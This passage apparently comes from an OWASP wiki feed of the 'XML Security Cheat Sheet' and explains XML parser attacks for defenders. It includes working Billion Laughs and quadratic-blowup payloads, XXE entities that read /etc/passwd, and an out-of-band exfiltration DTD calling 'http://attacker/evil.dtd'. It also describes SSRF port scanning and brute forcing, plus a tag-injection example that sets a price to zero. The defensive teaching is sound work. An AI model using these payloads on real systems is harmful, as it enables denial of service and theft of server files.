Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
   &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:ENVELOPE&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY '''%xxe''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt; &lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM ''''http://example.com/?%file;''''''&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224440</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224440"/>
				<updated>2016-12-21T20:27:20Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
